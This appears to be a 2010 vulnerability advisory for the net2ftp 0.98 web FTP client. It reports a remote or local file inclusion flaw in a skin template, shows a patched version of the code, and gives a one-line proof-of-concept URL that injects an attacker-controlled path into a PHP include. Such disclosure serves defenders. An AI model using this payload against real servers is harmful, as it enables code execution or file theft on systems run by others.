net2ftp Stable 0.98 RFI/LFI Vulnerability
2010-12-09 15:15:12net2ftp is web based ftp client used by many web shared hosting
////////////////////////////////////////////////////////////////////
Vuln is in file skins/mobile/admin1.template.php:
<?php require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php"); ?>
///////////////////////////////////////////////////////////////////
Pathed Version:
<?php
defined("NET2FTP") or die("Direct access to this location is not allowed.");
require_once($net2ftp_globals["application_skinsdir"] . "/blue/admin1.template.php");
?>
//////////////////////////////////////////////////////////////////
POC:
http://server/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil
Fixes
No fixesIn order to submit a new fix you need to be registered.